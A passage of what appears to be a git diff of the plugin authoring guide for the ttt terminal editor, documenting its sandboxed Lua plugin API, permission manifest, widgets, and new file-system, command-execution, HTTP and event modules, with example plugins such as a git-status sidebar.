+| `fs.exists(path)`    | `fs.read`  | boolean                    | Check if path exists.          |
+| `fs.list(path)`      | `fs.read`  | table of `{name, is_dir}`, or nil + error | List directory entries. |
+
+**Example:**
+
+```lua
+local fs = require("ttt.fs")
+
+if fs.exists("/tmp/config.json") then
+  local content = fs.read("/tmp/config.json")
+  -- process content
+end
+
+local entries = fs.list("/home/user/project")
+for _, entry in ipairs(entries) do
+  if entry.is_dir then
+    -- it's a directory
+  end
+end
+```
+
+---
+
+## System API
+
+The `ttt.system` module provides command execution and environment variable access.
+
+```lua
+local sys = require("ttt.system")
+```
+
+### `sys.exec(binary, args)`
+
+Execute a command synchronously. Requires `system.exec` permission with the binary listed in the allowlist.
+
+**Returns** a table: `{stdout, stderr, exit_code}`.
+
+```lua
+local result = sys.exec("git", {"status", "--porcelain"})
+if result.exit_code == 0 then
+  -- parse result.stdout
+end
+```
+
+### `sys.exec_async(binary, args, callback)`
+
+Execute a command asynchronously. The callback receives the same result table and is called on the main thread when the command completes. The UI remains responsive during execution.
+
+```lua
+sys.exec_async("docker", {"ps", "--format", "{{.Names}}"}, function(result)
+  -- process result.stdout
+  panel:redraw()
+end)
+```
+
+### `sys.env(name)`
+
+Read an environment variable. Requires `system.env` permission.
+
+```lua
+local home = sys.env("HOME")
+```
+
+---
+
+## Network API
+
+The `ttt.net` module provides HTTP request capabilities. Requires the `network.http` permission.
+
+```lua
+local net = require("ttt.net")
+```
+
+### `net.get(url, [opts])`
+
+Synchronous HTTP GET.
+
+```lua
+local resp = net.get("https://api.example.com/data")
+-- resp.status (number), resp.body (string), resp.headers (table), resp.error (string or nil)
+
+-- With custom headers:
+local resp = net.get("https://api.example.com/data", {
+  headers = { ["Authorization"] = "Bearer token" },
+})
+```
+
+### `net.post(url, opts)`
+
+Synchronous HTTP POST.
+
+```lua
+local resp = net.post("https://api.example.com/data", {
+  headers = { ["Content-Type"] = "application/json" },
+  body = '{"key": "value"}',
+})
+```
+
+### Async Variants
+
+`net.get_async(url, [opts], callback)` and `net.post_async(url, opts, callback)` work like their sync counterparts but don't block the UI. The callback receives the response table.
+
+```lua
+net.get_async("https://api.example.com/data", function(resp)
+  if resp.status == 200 then
+    -- process resp.body
+    panel:redraw()
+  end
+end)
+```
+
+---
+
+## Events API
+
+The `ttt.events` module lets plugins react to editor lifecycle events.
+
+```lua
+local events = require("ttt.events")
+```
+
+### `events.on(event_name, callback)`
+
+Register an event listener. Multiple listeners can be registered for the same event.
+
+**File events** (require `events.file` permission):
+
+| Event         | Callback argument | Description                 |
+|---------------|-------------------|-----------------------------|
+| `file.open`   | path (string)     | A file was opened.          |
+| `file.close`  | path (string)     | A file tab was closed.      |
+| `file.save`   | path (string)     | A file was saved.           |
+
+**Editor events** (require `events.editor` permission):
+
+| Event           | Callback argument | Description                 |
+|-----------------|-------------------|-----------------------------|
+| `editor.change` | path (string)     | Buffer content changed.     |
+
+**Example:**
+
+```lua
+local events = require("ttt.events")
+
+events.on("file.save", function(path)
+  -- auto-format or run linter after save
+end)
+
+events.on("file.open", function(path)
+  -- load file-specific config
+end)
+```
+
+---
+
 ## Styles
 
 Named styles available for both widget and raw cell rendering. Actual colors depend on the user's theme.
@@ -660,7 +885,7 @@ Permissions are declared in the manifest's `permissions` object. Boolean permiss
 }
 ```
 
-Note: Many permissions are reserved for future phases. Currently implemented: `panel.sidebar`, `panel.bottom`.
+Currently implemented: `panel.sidebar`, `panel.bottom`, `editor.read`, `editor.write`, `fs.read`, `fs.write`, `system.exec`, `system.env`, `network.http`, `events.file`, `events.editor`.
 
 ---
 
@@ -680,7 +905,7 @@ Plugins run in a sandboxed Lua 5.1 environment. Only safe standard library modul
 
 **Removed globals:** `dofile`, `loadfile` are set to nil.
 
-**Module loading:** `require()` only allows `"ttt"`. Any other module name raises an error.
+**Module loading:** `require()` allows `"ttt"`, `"ttt.editor"`, `"ttt.fs"`, `"ttt.system"`, `"ttt.net"`, and `"ttt.events"`. Any other module name raises an error.
 
 ---
 
@@ -969,4 +1194,105 @@ ttt.register({
     end,
   },
 })
+```
+
+### Git Status Panel (Editor + System + Events)
+
+A sidebar panel that shows `git status` output and refreshes on file save:
+
+```json
+{
+  "name": "git-status",
+  "entry": "init.lua",
+  "version": "0.1.0",
+  "permissions": {
+    "panel.sidebar": true,
+    "system.exec": ["git"],
+    "events.file": true
+  }
+}
+```
+
+```lua
+local ttt = require("ttt")
+local sys = require("ttt.system")
+local events = require("ttt.events")
+
+local files = {}
+local error_msg = nil
+
+local function refresh(panel)
+  local result = sys.exec("git", {"status", "--porcelain"})
+  if result.exit_code ~= 0 then
+    error_msg = result.stderr
+    files = {}
+  else
+    error_msg = nil
+    files = {}
+    for line in result.stdout:gmatch("[^\n]+") do
+      local status = line:sub(1, 2):match("%S+") or "?"
+      local path = line:sub(4)
+      table.insert(files, {
+        id = path,
+        label = path,
+        badge = status,
+        muted = status == "?",
+      })
+    end
+  end
+  if panel then panel:redraw() end
+end
+
+ttt.register({
+  sidebar = {
+    title = "Git",
+    render = function(panel)
+      if error_msg then
+        panel:label({ text = error_msg, style = "danger" })
+        return
+      end
+      if #files == 0 then
+        panel:label({ text = "Working tree clean", style = "muted" })
+        return
+      end
+      panel:label({ text = #files .. " changed files", style = "muted" })
+      panel:list({
+        items = files,
+        on_select = function(node)
+          -- could open the file here with editor API
+        end,
+      })
+      panel:button({
+        label = "&Refresh",
+        on_click = function()
+          refresh(panel)
+        end,
+      })
+    end,
+  },
+})
+
+-- Refresh on startup
+refresh(nil)
+
+-- Auto-refresh after file saves
+events.on("file.save", function(path)
+  -- Use exec_async to avoid blocking the UI
+  sys.exec_async("git", {"status", "--porcelain"}, function(result)
+    if result.exit_code == 0 then
+      error_msg = nil
+      files = {}
+      for line in result.stdout:gmatch("[^\n]+") do
+        local status = line:sub(1, 2):match("%S+") or "?"
+        local fpath = line:sub(4)
+        table.insert(files, {
+          id = fpath,
+          label = fpath,
+          badge = status,
+          muted = status == "?",
+        })
+      end
+    end
+  end)
+end)
 ```

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -1,0 +1,972 @@
+# Plugin Authoring Guide
+
+ttt supports Lua plugins that can render panels in the sidebar and bottom panel using either a widget-based API or raw cell drawing. Plugins run inside a sandboxed Lua 5.1 VM with no file system or network access by default — all capabilities are gated behind a permission system that users approve on first load.
+
+## Table of Contents
+
+- [Getting Started](#getting-started)
+- [Plugin Lifecycle](#plugin-lifecycle)
+- [Registration](#registration)
+- [Widget API](#widget-api)
+  - [Label](#label)
+  - [Tree](#tree)
+  - [List](#list)
+  - [Button](#button)
+  - [Input](#input)
+  - [Requesting Redraws](#requesting-redraws)
+- [Raw Cell API](#raw-cell-api)
+- [Mixing Widgets and Raw Cells](#mixing-widgets-and-raw-cells)
+- [State Management](#state-management)
+- [Reconciliation and State Preservation](#reconciliation-and-state-preservation)
+- [Focus and Keyboard Navigation](#focus-and-keyboard-navigation)
+- [Event Handling](#event-handling)
+- [Styles](#styles)
+- [Error Handling and Debugging](#error-handling-and-debugging)
+- [Permissions Reference](#permissions-reference)
+- [Lua Sandbox](#lua-sandbox)
+- [Managing Plugins](#managing-plugins)
+- [Examples](#examples)
+
+---
+
+## Getting Started
+
+### Directory Structure
+
+Plugins live in `~/.config/ttt/plugins/<plugin-name>/`. Each plugin is a directory containing a manifest file and one or more Lua source files:
+
+```
+~/.config/ttt/plugins/my-plugin/
+  plugin.ttt.json    # manifest (required)
+  init.lua           # entry point (referenced by manifest)
+```
+
+### Manifest
+
+Every plugin requires a `plugin.ttt.json` manifest file at the root of its directory:
+
+```json
+{
+  "name": "my-plugin",
+  "description": "A short description of what this plugin does",
+  "version": "1.0.0",
+  "author": "Your Name",
+  "entry": "init.lua",
+  "permissions": {
+    "panel.sidebar": true
+  }
+}
+```
+
+| Field         | Required | Description                                         |
+|---------------|----------|-----------------------------------------------------|
+| `name`        | yes      | Unique plugin identifier. Must match directory name. |
+| `description` | no       | Shown in the plugin list dialog.                    |
+| `version`     | no       | Semver version string.                              |
+| `author`      | no       | Plugin author name.                                 |
+| `entry`       | yes      | Path to the Lua entry point, relative to the plugin directory. |
+| `permissions` | no       | Object declaring required permissions (see [Permissions Reference](#permissions-reference)). |
+
+### Minimal Example
+
+`~/.config/ttt/plugins/hello/plugin.ttt.json`:
+
+```json
+{
+  "name": "hello",
+  "entry": "init.lua",
+  "permissions": { "panel.sidebar": true }
+}
+```
+
+`~/.config/ttt/plugins/hello/init.lua`:
+
+```lua
+local ttt = require("ttt")
+
+ttt.register({
+  sidebar = {
+    title = "Hello",
+    render = function(panel)
+      panel:label("Hello from a plugin!")
+    end,
+  },
+})
+```
+
+---
+
+## Plugin Lifecycle
+
+### Loading
+
+1. On startup, ttt scans `~/.config/ttt/plugins/` for directories containing `plugin.ttt.json`.
+2. For each plugin, the manifest is parsed and permissions are compared against the user's stored approvals in `~/.config/ttt/plugins.ttt.json`.
+3. If the plugin has been approved and its permissions haven't changed, it loads immediately: a sandboxed Lua VM is created, the entry file is executed, and `ttt.register()` wires up the panels.
+4. If the plugin is new or its permissions have changed since approval, an approval dialog appears showing the requested permissions. The user can Allow or Cancel.
+
+### Approval
+
+When a plugin requests permissions the user hasn't approved yet, ttt shows a dialog listing each permission. Once approved, the permissions are saved to `~/.config/ttt/plugins.ttt.json` and the plugin won't ask again unless its `plugin.ttt.json` requests new permissions.
+
+### Shutdown
+
+When ttt exits, all plugin Lua VMs are closed. Plugins don't need cleanup logic unless they hold external resources.
+
+### Reloading
+
+Currently, plugins are only loaded at startup. To reload a plugin after editing its Lua files, restart ttt.
+
+---
+
+## Registration
+
+The entry point Lua file must call `ttt.register()` to declare what the plugin provides. This is the only function available on the `ttt` module.
+
+`ttt.register()` accepts a table with `sidebar` and/or `bottom` fields. A plugin can register both:
+
+```lua
+local ttt = require("ttt")
+
+ttt.register({
+  sidebar = {
+    title = "Panel Title",       -- tab label
+    render = function(panel)     -- called each render frame
+      -- build UI here
+    end,
+    on_event = function(event)   -- optional: fallback event handler
+      -- handle key/mouse events not consumed by widgets
+    end,
+  },
+  bottom = {
+    title = "Output",
+    render = function(panel) end,
+    on_event = function(event) end,
+  },
+})
+```
+
+| Field      | Required | Description                                                    |
+|------------|----------|----------------------------------------------------------------|
+| `title`    | yes      | Displayed as the panel's tab label.                            |
+| `render`   | yes      | Function called each render frame. Receives a panel proxy object. |
+| `on_event` | no       | Fallback handler for key/mouse events not consumed by widgets. |
+
+**Sidebar** panels appear in the left sidebar alongside the file explorer. They require the `panel.sidebar` permission.
+
+**Bottom** panels appear in the bottom panel alongside the terminal. They require the `panel.bottom` permission.
+
+---
+
+## Widget API
+
+The `render` function receives a **panel proxy** object. Call methods on it to build a declarative widget tree. Widgets are stacked vertically in the order they are declared.
+
+The render function is called every time the panel needs to redraw. Widget state (selection, expanded nodes, input text, cursor position) is **automatically preserved** between render calls — you don't need to manage it yourself.
+
+### Label
+
+Display a line of text, optionally styled.
+
+**Simple string form:**
+
+```lua
+panel:label("Status: OK")
+panel:label("Some text")
+```
+
+**Table form (with style):**
+
+```lua
+panel:label({ text = "Error occurred!", style = "danger" })
+panel:label({ text = "Hint: press Enter", style = "muted" })
+```
+
+| Parameter | Type           | Description                          |
+|-----------|----------------|--------------------------------------|
+| argument  | string or table | String for simple text. Table with `text` and optional `style` fields. |
+
+Labels are not focusable — they display text only and don't receive keyboard events.
+
+---
+
+### Tree
+
+Hierarchical list with expandable nodes, keyboard navigation (arrows, Enter), and mouse support.
+
+```lua
+panel:tree({
+  items = {
+    {
+      id = "src",
+      label = "src/",
+      icon = "📁",
+      expandable = true,
+      expanded = true,
+      children = {
+        { id = "main.go", label = "main.go", icon = "📄" },
+        { id = "util.go", label = "util.go", icon = "📄", muted = true },
+      },
+    },
+    { id = "readme", label = "README.md", icon = "📄", badge = "modified" },
+  },
+  indent = 2,
+  on_select = function(node)
+    -- called when a node is activated (Enter key or double-click)
+  end,
+  on_expand = function(node)
+    -- called when a node is expanded
+  end,
+})
+```
+
+**Tree config fields:**
+
+| Field       | Type     | Default | Description                                    |
+|-------------|----------|---------|------------------------------------------------|
+| `items`     | table    | `{}`    | Array of tree node tables (see below).         |
+| `indent`    | number   | `2`     | Number of spaces per nesting level.            |
+| `on_select` | function | nil     | Callback when a node is activated.             |
+| `on_expand` | function | nil     | Callback when a node is expanded.              |
+
+**Tree node fields:**
+
+| Field        | Type    | Default | Description                                  |
+|--------------|---------|---------|----------------------------------------------|
+| `id`         | string  | —       | Unique identifier. Required for state preservation. |
+| `label`      | string  | `""`    | Display text.                                |
+| `icon`       | string  | `""`    | Icon string displayed before the label.      |
+| `badge`      | string  | `""`    | Badge text displayed after the label.        |
+| `muted`      | bool    | `false` | Render the label in a dimmed style.          |
+| `expandable` | bool    | `false` | Show expand/collapse chevron indicator.      |
+| `expanded`   | bool    | `false` | Initial expanded state (only used on first render — see [Reconciliation](#reconciliation-and-state-preservation)). |
+| `children`   | table   | `{}`    | Array of child node tables.                  |
+
+**Callback argument:** Both `on_select` and `on_expand` receive a Lua table with the same fields as the node that was interacted with (`id`, `label`, `icon`, `badge`, `muted`, `expanded`), plus a `children` table if the node has children.
+
+**Keyboard navigation:** When focused, arrow keys move selection, Enter activates `on_select`, Left/Right collapse/expand nodes.
+
+---
+
+### List
+
+Flat list — functionally identical to a tree but without nesting or expand/collapse behavior.
+
+```lua
+panel:list({
+  items = {
+    { id = "item1", label = "First item", icon = "•" },
+    { id = "item2", label = "Second item", icon = "•", badge = "new" },
+    { id = "item3", label = "Third item", muted = true },
+  },
+  on_select = function(node)
+    -- called when an item is activated
+  end,
+})
+```
+
+**List config fields:**
+
+| Field       | Type     | Description                                    |
+|-------------|----------|------------------------------------------------|
+| `items`     | table    | Array of item tables (same fields as tree nodes). |
+| `on_select` | function | Callback when an item is activated.            |
+
+Items use the same field format as [tree nodes](#tree).
+
+---
+
+### Button
+
+Clickable button that responds to Enter, Space, and mouse click when focused.
+
+```lua
+panel:button({
+  label = "Run Tests",
+  on_click = function()
+    -- handle the button press
+  end,
+})
+```
+
+**Button config fields:**
+
+| Field      | Type     | Description                                    |
+|------------|----------|------------------------------------------------|
+| `label`    | string   | Button text. Use `&` for an accelerator: `"&Save"` underlines S. |
+| `on_click` | function | Callback when the button is pressed.           |
+
+---
+
+### Input
+
+Single-line text input with placeholder text and optional prefix.
+
+```lua
+panel:input({
+  placeholder = "Type to search...",
+  prefix = "🔍 ",
+  on_change = function(text)
+    -- called on every keystroke with the current text
+  end,
+  on_submit = function(text)
+    -- called when Enter is pressed with the current text
+  end,
+})
+```
+
+**Input config fields:**
+
+| Field         | Type     | Default | Description                                    |
+|---------------|----------|---------|------------------------------------------------|
+| `placeholder` | string   | `""`    | Grayed-out hint text shown when input is empty.|
+| `prefix`      | string   | `""`    | Non-editable text displayed before the input.  |
+| `on_change`   | function | nil     | Called after every text change. Receives the current text as a string. |
+| `on_submit`   | function | nil     | Called when Enter is pressed. Receives the current text as a string. |
+
+The input text and cursor position are automatically preserved across re-renders.
+
+---
+
+### Requesting Redraws
+
+The editor only redraws when events occur (key press, mouse, resize). If your plugin's state changes outside of event handling — for example, after modifying a data table in a callback — call `panel:redraw()` to request a redraw:
+
+```lua
+local items = { { id = "1", label = "Loading..." } }
+
+ttt.register({
+  sidebar = {
+    title = "Data",
+    render = function(panel)
+      panel:list({
+        items = items,
+        on_select = function(node)
+          -- modify the data
+          table.insert(items, { id = tostring(#items + 1), label = "New item" })
+          -- request the panel to redraw with updated data
+          panel:redraw()
+        end,
+      })
+    end,
+  },
+})
+```
+
+`panel:redraw()` posts an event to the editor's event loop. The render function will be called again on the next frame, and the updated state will be reflected. This is safe to call from any callback.
+
+---
+
+## Raw Cell API
+
+For full control over pixel-level rendering, use the low-level cell API. This draws directly to the panel surface without the widget abstraction.
+
+### `panel:size()`
+
+Returns the panel's width and height in cells.
+
+```lua
+local w, h = panel:size()
+```
+
+**Returns:** two numbers — width, height.
+
+### `panel:cell(x, y, char, [style])`
+
+Draw a single character at the given position.
+
+```lua
+panel:cell(0, 0, "X")                         -- default style
+panel:cell(1, 0, "Y", "success")              -- named style as string
+panel:cell(2, 0, "Z", { style = "danger" })   -- named style as table
+```
+
+| Parameter | Type            | Description                                |
+|-----------|-----------------|--------------------------------------------|
+| `x`       | number          | Column (0-based).                          |
+| `y`       | number          | Row (0-based).                             |
+| `char`    | string          | Single character to draw (first rune used).|
+| `style`   | string or table | Optional. Named style string or table with `style` field. |
+
+### `panel:text(x, y, text, [style])`
+
+Draw a text string starting at the given position.
+
+```lua
+panel:text(0, 0, "Hello World")                -- default style
+panel:text(0, 1, "Error!", "danger")           -- named style as string
+panel:text(0, 2, "Hint", { style = "muted" }) -- named style as table
+```
+
+| Parameter | Type            | Description                                |
+|-----------|-----------------|--------------------------------------------|
+| `x`       | number          | Starting column (0-based).                 |
+| `y`       | number          | Row (0-based).                             |
+| `text`    | string          | Text to draw.                              |
+| `style`   | string or table | Optional. Named style.                     |
+
+### `panel:clear(x, y, w, h)`
+
+Clear a rectangular region, filling it with spaces.
+
+```lua
+panel:clear(0, 0, 40, 10)
+```
+
+| Parameter | Type   | Description         |
+|-----------|--------|---------------------|
+| `x`       | number | Left column.        |
+| `y`       | number | Top row.            |
+| `w`       | number | Width in cells.     |
+| `h`       | number | Height in cells.    |
+
+---
+
+## Mixing Widgets and Raw Cells
+
+You can use both the widget API and the raw cell API in the same render function. When mixed:
+
+- **Widgets** are rendered from the top of the panel in a vertical stack.
+- **Raw cells** are drawn directly to the surface and can overlap or fill areas below the widgets.
+
+```lua
+render = function(panel)
+  -- Widget at the top
+  panel:label({ text = "Status Bar", style = "muted" })
+
+  -- Raw drawing below
+  local w, h = panel:size()
+  for x = 0, w - 1 do
+    panel:cell(x, 2, "─", "border")
+  end
+  panel:text(0, 3, "Custom rendered content")
+end
+```
+
+Note that raw cell coordinates are relative to the full panel surface, not offset by widget height. If your widgets take up 2 rows, drawing at y=0 will overlap them.
+
+---
+
+## State Management
+
+Plugin state lives in **Lua local variables** in your entry file. The Lua VM persists for the lifetime of the ttt process, so locals defined at the top level retain their values between render calls:
+
+```lua
+local ttt = require("ttt")
+
+-- This table persists across renders
+local counter = 0
+local items = {}
+
+ttt.register({
+  sidebar = {
+    title = "Counter",
+    render = function(panel)
+      panel:label("Count: " .. counter)
+      panel:button({
+        label = "&Increment",
+        on_click = function()
+          counter = counter + 1
+          table.insert(items, { id = tostring(counter), label = "Item " .. counter })
+          panel:redraw()
+        end,
+      })
+      panel:list({ items = items })
+    end,
+  },
+})
+```
+
+**Pattern: reactive updates.** Modify your state in callbacks, then call `panel:redraw()` to trigger a re-render with the new state. The render function reads from the current state each time it's called.
+
+---
+
+## Reconciliation and State Preservation
+
+The widget system uses a **reconciliation** algorithm to preserve interactive state across re-renders:
+
+1. Each render call builds a list of widget descriptors (label, tree, button, etc.).
+2. After the render function returns, ttt compares the new descriptors against the previous frame.
+3. If a widget at the same position has the same type, it is **updated in place** — preserving user-facing state.
+4. If the type changed, the old widget is replaced with a new one.
+
+**What is preserved:**
+- **Tree/List:** Expanded/collapsed state of nodes (matched by `id`), selected item, scroll position.
+- **Input:** Text content, cursor position.
+- **Button:** Focus state.
+
+**What is NOT preserved:**
+- Anything that changes when you provide different data (labels, items, badges, icons — these update to reflect the new values).
+- State across type changes (if position 0 was a label and becomes a tree, the tree starts fresh).
+
+**Important:** Node `id` fields are critical for tree state preservation. If you change a node's `id`, it will be treated as a new node and lose its expanded state. Use stable, unique IDs.
+
+---
+
+## Focus and Keyboard Navigation
+
+The plugin panel manages its own focus system. When the plugin panel is focused:
+
+- **Tab** / **Shift+Tab** cycles focus between focusable widgets (trees, lists, inputs, buttons).
+- **Arrow keys** navigate within the focused widget (e.g., up/down in a tree).
+- **Enter** / **Space** activate the focused widget (select tree node, press button, submit input).
+- Events not consumed by the focused widget fall through to the `on_event` handler.
+
+Labels are not focusable. If your panel has only labels and raw cells, all events go directly to `on_event`.
+
+---
+
+## Event Handling
+
+There are two levels of event handling:
+
+### 1. Widget Callbacks (Automatic)
+
+Widget-specific events are routed automatically to the callbacks you provide:
+
+| Widget | Event        | Callback     | Argument                            |
+|--------|--------------|--------------|-------------------------------------|
+| Tree   | node activated | `on_select` | Node table (`{id, label, ...}`)     |
+| Tree   | node expanded  | `on_expand` | Node table                          |
+| List   | item activated | `on_select` | Node table                          |
+| Button | pressed      | `on_click`   | (none)                              |
+| Input  | text changed | `on_change`  | Current text (string)               |
+| Input  | Enter pressed| `on_submit`  | Current text (string)               |
+
+### 2. Fallback Event Handler (`on_event`)
+
+For key and mouse events not consumed by widgets, the `on_event` function receives a Lua table describing the event:
+
+**Key event:**
+
+```lua
+{
+  type = "key",
+  key = "Enter",     -- key name: "Enter", "Tab", "Escape", "Up", "Down", "Left", "Right",
+                     -- "Backspace", "Delete", "Home", "End", "PgUp", "PgDn",
+                     -- or the character itself ("a", "A", "1", "/", etc.)
+  mod = "ctrl",      -- modifier: "ctrl", "shift", "alt", or nil for no modifier
+}
+```
+
+**Mouse event:**
+
+```lua
+{
+  type = "mouse",
+  x = 5,             -- column (0-based, relative to panel)
+  y = 10,            -- row (0-based, relative to panel)
+  button = "left",   -- "left", "right", "middle"
+}
+```
+
+**Example:**
+
+```lua
+on_event = function(event)
+  if event.type == "key" then
+    if event.key == "r" and event.mod == nil then
+      -- refresh data
+      reload_data()
+      panel:redraw()
+    end
+  end
+end
+```
+
+---
+
+## Styles
+
+Named styles available for both widget and raw cell rendering. Actual colors depend on the user's theme.
+
+| Name       | Typical Usage                  |
+|------------|--------------------------------|
+| `default`  | Normal text                    |
+| `muted`    | Dimmed, secondary text         |
+| `border`   | Panel borders, separators      |
+| `success`  | Green, positive status         |
+| `danger`   | Red, errors                    |
+| `warning`  | Yellow, caution                |
+| `selected` | Highlighted/selected item      |
+| `item`     | List/palette item              |
+| `line`     | Line numbers                   |
+| `input`    | Input field text               |
+
+Styles can be passed as a string or a table:
+
+```lua
+panel:text(0, 0, "OK", "success")                -- string form
+panel:cell(0, 0, "X", { style = "danger" })       -- table form
+panel:label({ text = "Note", style = "muted" })   -- in widget config
+```
+
+If an unrecognized style name is used, it falls back to `default`.
+
+---
+
+## Error Handling and Debugging
+
+### Render Errors
+
+If your `render` function throws a Lua error, the plugin panel displays the error message in red (`danger` style) instead of the normal content. The plugin stays loaded and will retry rendering on the next frame — so fixing the error in your Lua file and restarting ttt will recover.
+
+Errors are also logged to stderr, so if you run ttt from a terminal you'll see them there.
+
+### Callback Errors
+
+If a callback function (`on_select`, `on_click`, etc.) throws an error, it is caught and logged. The error is stored on the plugin's `LastError` field and displayed in the plugin list (accessible via the command palette: **Plugins: List Installed**).
+
+### Debugging Tips
+
+- **Start simple.** Begin with a single `panel:label()` to verify your plugin loads, then add complexity.
+- **Use labels for debugging.** Since there's no `print()` to the console, use `panel:label()` to display variable values in your panel.
+- **Check the plugin list.** Open the command palette and run **Plugins: List Installed** to see status (enabled/disabled/error) and version for each plugin.
+- **Watch stderr.** Run ttt from a terminal to see error logs: `ttt 2>plugin-errors.log`.
+
+---
+
+## Permissions Reference
+
+Permissions are declared in the manifest's `permissions` object. Boolean permissions are set to `true`; array permissions list specific values.
+
+| Permission       | Type     | Description                                       |
+|------------------|----------|---------------------------------------------------|
+| `panel.sidebar`  | bool     | Register a sidebar panel.                         |
+| `panel.bottom`   | bool     | Register a bottom panel.                          |
+| `panel.drawer`   | bool     | Register a drawer panel. (Reserved for future use.) |
+| `commands`       | bool     | Register commands in the command palette.         |
+| `keybindings`    | bool     | Bind keyboard shortcuts.                          |
+| `editor.read`    | bool     | Read the contents of editor buffers.              |
+| `editor.write`   | bool     | Modify the contents of editor buffers.            |
+| `fs.read`        | bool     | Read files from the file system.                  |
+| `fs.write`       | bool     | Write files to the file system.                   |
+| `system.exec`    | string[] | Execute specific system commands. List each binary. |
+| `system.env`     | bool     | Read environment variables.                       |
+| `network.http`   | bool     | Make outbound HTTP requests.                      |
+| `events.file`    | bool     | Receive file system change events.                |
+| `events.editor`  | bool     | Receive editor events (cursor move, file open, etc.). |
+
+**Example with multiple permissions:**
+
+```json
+{
+  "permissions": {
+    "panel.sidebar": true,
+    "panel.bottom": true,
+    "system.exec": ["git", "npm"],
+    "fs.read": true
+  }
+}
+```
+
+Note: Many permissions are reserved for future phases. Currently implemented: `panel.sidebar`, `panel.bottom`.
+
+---
+
+## Lua Sandbox
+
+Plugins run in a sandboxed Lua 5.1 environment. Only safe standard library modules are available:
+
+| Module   | Available | Notes                        |
+|----------|-----------|------------------------------|
+| `base`   | yes       | `print`, `type`, `tostring`, `tonumber`, `pairs`, `ipairs`, `select`, `unpack`, `error`, `pcall`, `xpcall`, `assert`, `rawget`, `rawset`, `rawequal`, `setmetatable`, `getmetatable` |
+| `string` | yes       | Full string library (`format`, `find`, `gsub`, `match`, `sub`, `rep`, `upper`, `lower`, `byte`, `char`, `len`, `reverse`) |
+| `table`  | yes       | Full table library (`insert`, `remove`, `sort`, `concat`, `maxn`) |
+| `math`   | yes       | Full math library (`floor`, `ceil`, `sqrt`, `sin`, `cos`, `random`, `pi`, etc.) |
+| `os`     | **no**    | Blocked entirely.            |
+| `io`     | **no**    | Blocked entirely.            |
+| `debug`  | **no**    | Not loaded.                  |
+
+**Removed globals:** `dofile`, `loadfile` are set to nil.
+
+**Module loading:** `require()` only allows `"ttt"`. Any other module name raises an error.
+
+---
+
+## Managing Plugins
+
+### Installing
+
+Copy or clone the plugin directory into `~/.config/ttt/plugins/`:
+
+```sh
+cp -r my-plugin ~/.config/ttt/plugins/
+```
+
+Restart ttt. If the plugin is new, you'll see an approval dialog.
+
+### Plugin List
+
+Open the command palette (`Ctrl+Shift+P`) and run **Plugins: List Installed** to see all installed plugins with their status and version.
+
+### Removing
+
+Delete the plugin directory:
+
+```sh
+rm -rf ~/.config/ttt/plugins/my-plugin
+```
+
+The approval record in `~/.config/ttt/plugins.ttt.json` can be left — it's harmless and will be ignored.
+
+---
+
+## Examples
+
+### File Tree Browser
+
+A sidebar panel that shows a static file tree:
+
+```json
+{
+  "name": "file-tree",
+  "entry": "init.lua",
+  "permissions": { "panel.sidebar": true }
+}
+```
+
+```lua
+local ttt = require("ttt")
+
+local tree = {
+  {
+    id = "src", label = "src/", icon = "📁", expandable = true, expanded = true,
+    children = {
+      { id = "src/main.go", label = "main.go", icon = "📄" },
+      { id = "src/server.go", label = "server.go", icon = "📄" },
+      {
+        id = "src/handlers", label = "handlers/", icon = "📁", expandable = true,
+        children = {
+          { id = "src/handlers/auth.go", label = "auth.go", icon = "📄" },
+          { id = "src/handlers/api.go", label = "api.go", icon = "📄" },
+        },
+      },
+    },
+  },
+  { id = "go.mod", label = "go.mod", icon = "📄", muted = true },
+  { id = "README.md", label = "README.md", icon = "📄", muted = true },
+}
+
+local selected_file = nil
+
+ttt.register({
+  sidebar = {
+    title = "Files",
+    render = function(panel)
+      if selected_file then
+        panel:label({ text = "Selected: " .. selected_file, style = "muted" })
+      end
+      panel:tree({
+        items = tree,
+        indent = 2,
+        on_select = function(node)
+          selected_file = node.label
+          panel:redraw()
+        end,
+      })
+    end,
+  },
+})
+```
+
+### Search Panel with Input
+
+A bottom panel with a search input and results list:
+
+```json
+{
+  "name": "search-panel",
+  "entry": "init.lua",
+  "permissions": { "panel.bottom": true }
+}
+```
+
+```lua
+local ttt = require("ttt")
+
+local results = {}
+local query = ""
+
+local function do_search(text)
+  query = text
+  results = {}
+  -- In a real plugin with fs.read permission, you'd search files here.
+  -- For demo, generate fake results:
+  if #text > 0 then
+    for i = 1, 5 do
+      table.insert(results, {
+        id = tostring(i),
+        label = "Result " .. i .. " for '" .. text .. "'",
+        badge = "line " .. (i * 10),
+      })
+    end
+  end
+end
+
+ttt.register({
+  bottom = {
+    title = "Search",
+    render = function(panel)
+      panel:input({
+        placeholder = "Search...",
+        prefix = "🔍 ",
+        on_change = function(text)
+          do_search(text)
+          panel:redraw()
+        end,
+        on_submit = function(text)
+          do_search(text)
+          panel:redraw()
+        end,
+      })
+      if #results > 0 then
+        panel:label({ text = #results .. " results for '" .. query .. "'", style = "muted" })
+        panel:list({
+          items = results,
+          on_select = function(node)
+            -- In a real plugin, you'd open the file at the matching line
+          end,
+        })
+      elseif #query > 0 then
+        panel:label({ text = "No results", style = "warning" })
+      end
+    end,
+  },
+})
+```
+
+### Raw Cell Drawing — Progress Bar
+
+A sidebar panel using only the raw cell API:
+
+```json
+{
+  "name": "progress",
+  "entry": "init.lua",
+  "permissions": { "panel.sidebar": true }
+}
+```
+
+```lua
+local ttt = require("ttt")
+
+local progress = 0.65  -- 65%
+
+ttt.register({
+  sidebar = {
+    title = "Progress",
+    render = function(panel)
+      local w, h = panel:size()
+
+      panel:text(0, 0, "Build Progress", "muted")
+
+      -- Draw progress bar
+      local bar_w = w - 2
+      local filled = math.floor(bar_w * progress)
+
+      for x = 0, bar_w - 1 do
+        if x < filled then
+          panel:cell(x + 1, 2, "█", "success")
+        else
+          panel:cell(x + 1, 2, "░", "muted")
+        end
+      end
+
+      -- Draw percentage
+      local pct = math.floor(progress * 100) .. "%"
+      panel:text(1, 4, pct, "default")
+    end,
+  },
+})
+```
+
+### TODO List (Sidebar + Bottom)
+
+A plugin that registers both a sidebar list and a bottom detail view:
+
+```json
+{
+  "name": "todo-list",
+  "entry": "init.lua",
+  "version": "0.1.0",
+  "permissions": {
+    "panel.sidebar": true,
+    "panel.bottom": true
+  }
+}
+```
+
+```lua
+local ttt = require("ttt")
+
+local todos = {
+  { id = "1", label = "Write plugin docs", done = false },
+  { id = "2", label = "Add tests", done = false },
+  { id = "3", label = "Ship it!", done = false },
+}
+
